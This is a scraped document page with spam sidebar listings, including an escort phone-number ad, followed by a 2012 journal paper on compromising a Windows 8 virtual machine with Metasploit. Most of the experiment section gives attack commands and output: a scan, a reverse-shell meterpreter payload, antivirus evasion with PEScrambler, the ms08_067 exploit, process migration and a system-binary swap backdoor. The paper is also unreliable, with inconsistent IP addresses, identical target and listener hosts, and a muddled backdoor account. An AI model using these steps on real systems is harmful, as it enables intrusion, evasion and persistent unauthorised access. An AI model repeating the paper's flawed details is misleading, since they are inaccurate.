Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 

Compromising windows 8 with metasploit’s exploit

  • 1. IOSR Journal of Computer Engineering (IOSRJCE) ISSN: 2278-0661, ISBN: 2278-8727 Volume 5, Issue 6 (Sep-Oct. 2012), PP 01-04 www.iosrjournals.org www.iosrjournals.org 1 | Page Compromising windows 8 with metasploit’s exploit 1 Monika Pangaria, 2 Vivek Shrivastava, 3 Priyanka Soni 1 M.Tech (I.T.) Student,I.T.M. College, 2 Asst. Prof. (I.T.), I.T.M. College, 3 M.Tech.(I.T.) ,Student Banasthali Vidyapeeth Abstract: Windows 8, the latest operating system by Microsoft will be launching soon in October 2012. It is designed and developed for use of desktops, laptops, tablets and home theatre PC’s as well. Pentesting – It is a process to simulate all the possible notorious ways used by hackers to breach a system’s security. But on the contrary it is purely ethical in deed so as to know in advance how a machine can suffer security circumvention attack. The main motto of this paper is to compromise a system with windows 8 OS. This pentest breach the Anti malware protection process. Using metasploit expoit ms08_067_netapi and meterpreter payload windows/meterpreter/reverse_tcp we get our goal. The thing to be bothered about is meterpreter payload can now be encountered by Anti-Viruses. And spotlight in windows 8 Anti Malware Protection perform icing on a cake. We do condone this spotlight in our experiment using PEScrambler. Keywords: Penetration Testing, Exploit, Payload, FUD(fully undetectable). I. Introduction Penetration Testing is a conduct implicates assimilation of deeds used by hackers to rupture enterprise‟s security[9]. Windows 8, is ameliorating esteem among people at an exponential rate. So by the couple of months it will be installed on millions of desktops, laptops, tablets. This paper encircle all the efforts done in penetrating into machine having windows 8. The tools we have used in this context are Metasploit Framework 3.0, nmap, PEscrambler. II. Concept Fig.1 shows the hypothesis behind Penetration Testing. Fig. 1 Penetration Testing Process Here, computer A is supposed to be a victim of computer B. First a union of exploit + payload is injected into a victim‟s computer [1].Then exploit comes into work, payloads commences its attack process only if an exploit get its desired acquirement. Once an exploit entretched, a reverse connection is established. Now, a time for action, we can procure dominance like data registry read/write operations , uploading and downloading, taking snapshots, process migration, key strokes scan and much more to do. Once the desired tasks are amassed we can raise the bar for privelege escalation. III. Experiment Aim : Compromising window 8 with Metasploit‟s exploit. Experiment Setup: Creating a virtual lab having following stuff. They are 1. Vmware Workstation 9.0 2. Windows 8 consumer preview 64 bit 3. Backtrack 5 R1 (Linux based OS) •Payload run if exploit succeed •Reverse connecti on •Exploit runs •Exploit+ Payload 1 2 34
  • 2. Compromising Windows 8 With Metasploit’s Exploit www.iosrjournals.org 2 | Page 4. PEScrambler _v0_1 Process : 1. Intelligence Gathering and Vulnerability Scanning[3] - It acquires target knowledge and made foundation of pentest without revealing attacker‟s presence and its desires. It is the most cardinal step of penetration test as it supplies a base for it. The tool availed by us for port scanning is NMAP. For scanning selective range of IP Addresses we do this with a command root@bt:~# Nmap 192.168.129.* This will assemble all the information like state of host, closed ports, open ports. We get the following result for our target 192.168.129.133 root@bt:~# 192.468.129.133 Nmap scan report for 172.168.129.133 Host is up (0.00078s latency). Not shown: 993 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 554/tcp open rtsp 2869/tcpopen icslap 5357/tcpopen wsdapi 10243/tcp open unknown MAC Address 00:0C:29:14:9A:EF (vmware) Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds 2. Making .exe payload Next step is to make an exe file clutching payload within. root@bt: /# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.129.128 LPORT 4444 x > /root/test.exe The outcome test.exe will be placed in root folder. Now its time for bustle, But afore we do this, crucial point that may perturbed is MALWARE PROTECTION PROCESS inbuilt in windows 8. When we load this file in windows 8 running machine it will be detected. So two ways to get eradicated from this : 1. Either attenuate Malware Protection Process. 2. Or beget this exe FUD (fully undetectable). 3. FUD Construction – Any Anti-Virus program or Anti-Malware program disclose virus through a special virus signature that sizes 1 Byte. PEScrambler works solely on windows platform. So once payload is contrived in backtrack, load it into windows machine. Let see how it works[8] ? - Copy the payload in same directory in which PEScrambler is located. - Type the following command in cmd window and do not disremember to change directory to PEScrambler folder. Using command- PEScrambler.exe -i test.exe –o undetectable.exe - Now It‟s utterly encoded. It will not be pinpointed by Anti Malware Protection mechanism inbuilt with Windows 8 4. Exploitation – Exploits are deleterious code that runs against loopholes or vulnerabilities that we earlier determined in penetration test stages. Exploits execute within msfconsole[4]. msf > use exploit/windows/smb/ms08_067_netapi msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD -> windows/meterpreter/reverse_tcp msf exploit (handler) > set RHOST 192.168.129.128 RHOST -> 192.168.129.128 msf exploit (handler) > set LHOST 192.168.129.128 LHOST -> 192.168.129.128 msf exploit (handler) > set LPORT 4444
  • 3. Compromising Windows 8 With Metasploit’s Exploit www.iosrjournals.org 3 | Page LPORT -> 4444 msf exploit (handler) > exploit [*] Started reverse handler on 192.168.129.128 [*] Starting the payload handler [*] Sending stage (752128 bytes) to 192.168.129.133 [*] Meterpreter session 1 opened (192.168.129.128:4444 -> 192.168.129.133:49168) at 2012-08-30 23:55:57 +0530 meterpreter > Here we got meterpreter session!!! 5. Meterpreter Once we reach meterpreter session, we can exploit in any way we want. Lets build a backdoor using eterpreter. Now get the current process identifier[5]. meterpreter > getpid Current pid : 3632 Now see which pid is this by using command „ps‟. meterpreter > ps It will result in following PID 3632 Name test.exe Arch x86 Session1 User win/Monika Path C:UsersMonikaDesktoptest.exe Now to change our pid we must migrate to another process.To see list of processes running on target meterpreter > ps Search for explorer.exe PID 2512 Name explorer.exe Arch x86 Session 1 User win/Monika Path C:Windowsexplorer.exe Now migrate to this process[7]. meterpreter >migrate 2512 [*] Migrating to 2512 [*] Migration completed successfully. Now again check pid meterpreter >getpid Current Identifier : 2512 Now inquiry system info meterpreter > sysinfo Computer : WIN Os : Windows 8 Architecture : x64 System Language: en_US Meterpreter : x64/win64 Now the terminal step is to access C Drive[8]. meterpreter > shell Process 1632 created. Channel 1 created. Microsoft Windows [Version 6.2.8250] © 2012 Microsoft Corporation All Rights Reserved. C:UsersMonikaDesktop>cd
  • 4. Compromising Windows 8 With Metasploit’s Exploit www.iosrjournals.org 4 | Page C:>cd Windows/System32 C:WindowsSystem32> Once we get into system32 folder. Simply rename cmd.exe as osk.exe and osk.exe as cmd.exe. This will open a backdoor. Whenever we wish to access that system no entrance fee is required[6]. When it buzz for password, press Shift Key 5 times, you will get an instance of explorer.exe and machine is being compromised. IV. Future Scope And Conclusion Future Scope: In future, patches should be made in order to prevent these exploits breaching security. The performance of this penetration test can be enhanced by using Core Impact with Metasploit Framework. Conclusion: To be concluded, yet windows 8 is accomodated with wide level security and an impression behind it was to oppress all those exasperating creeps. It demands to be more secure and steadfast so that not even single exploit can convince it be compromised. References [1] Bing Duan "An Easy-to-Deploy Penetration Testing Platform." Young Computer Scientists, 2008. ICYCS 2008. The 9th International Conference for Date : 18-21 Nov. 2008 Page(s): 2314 – 2318. [2] Bechtsoudis, A. "Aiming at Higher Network Security through Extensive Penetration Tests". Latin America Transactions, IEEE (Revista IEEE America Latina) April 2012 Volume: 10 , Issue: 3 Page(s): 1752 - 1756 [3] Turpe, S. "Common Precautions in Penetration Testing." Academic and Industrial Conference - Practice and Research Techniques, 2009. TAIC PART '09. Date : 4-6 Sept. 2009. Page(s): 205 - 209 [4] “Metasploit: The Penetration Tester's Guide” By David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharon. ISBN-10: 1-59327- 288-X. [5] “Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research” By David Maynor, K.K.Mookhey, Jacopo Cervini, Fairuzan Roslan, Kevin Bewer. ISBN 13: 978-1-59749-074-0. By Syngress Publishing Inc. [6] Sankalp Singh "Fast Model Based Penetration Testing". Simulation Conference, 2004. Proceedings of the 2004 Winter Date : 5-8 Dec. 2004. Volume 1 Page(s): 2314 – 2318. [7] Bishop M. “About Penetration Testing". Security and privacy IEEE Nov-Dec 2007. Volume 5 Page(s): 84 – 87. [8] http://kerelacyberforce.in/making-your-executable-undetectable-with-pescrambler [9] Robinson, S. “Art of Penetration Testing” Security of Distributed Control Systems, 2005. The IEEE Seminar on Date : 2 Nov. 2005.